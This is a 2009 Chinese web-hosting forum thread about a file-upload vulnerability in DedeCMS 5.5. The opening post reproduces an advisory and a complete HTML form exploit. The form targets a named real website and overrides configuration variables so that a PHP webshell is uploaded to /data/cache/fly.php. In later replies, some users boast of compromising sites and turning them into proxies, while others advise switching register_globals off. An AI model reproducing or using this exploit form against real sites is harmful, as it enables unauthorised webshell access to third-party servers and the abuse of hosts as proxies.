全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 14898|回复: 51
打印 上一主题 下一主题

[经验] dede5.5爆漏洞了!!我站被日了!(附带利用方法)

[复制链接]
跳转到指定楼层
1#
发表于 2009-10-27 00:20:54 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://www.sebug.net/vulndb/12518/

影响版本:
Dedecms 5.5漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考
by:Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
52#
发表于 2009-11-4 18:15:52 | 只看该作者
占位
51#
发表于 2009-10-27 10:45:05 | 只看该作者

回复 50# 的帖子

这个最好off掉,一般的程序都不要求on。
50#
发表于 2009-10-27 10:34:19 | 只看该作者
Register_Globals:Off
49#
发表于 2009-10-27 09:40:23 | 只看该作者

回复 48# 的帖子

小代理?
48#
发表于 2009-10-27 09:25:37 | 只看该作者
拿下一个站就可以用php做个小代理,该干嘛干嘛啦
47#
发表于 2009-10-27 09:01:16 | 只看该作者

回复 45# 的帖子

呵呵,肯定Google搜索了上百个dedecms站点。
46#
发表于 2009-10-27 09:00:50 | 只看该作者
我拿下一个站,但不知道有什么用处。
45#
发表于 2009-10-27 08:59:41 | 只看该作者
register_globals=on 默认关闭的,楼主能拿下这么多,运气不是一般的好
44#
发表于 2009-10-27 08:53:21 | 只看该作者

回复 43# 的帖子

register_global 很多虚拟主机都不会开这个的。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-9-28 04:05 , Processed in 0.106494 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表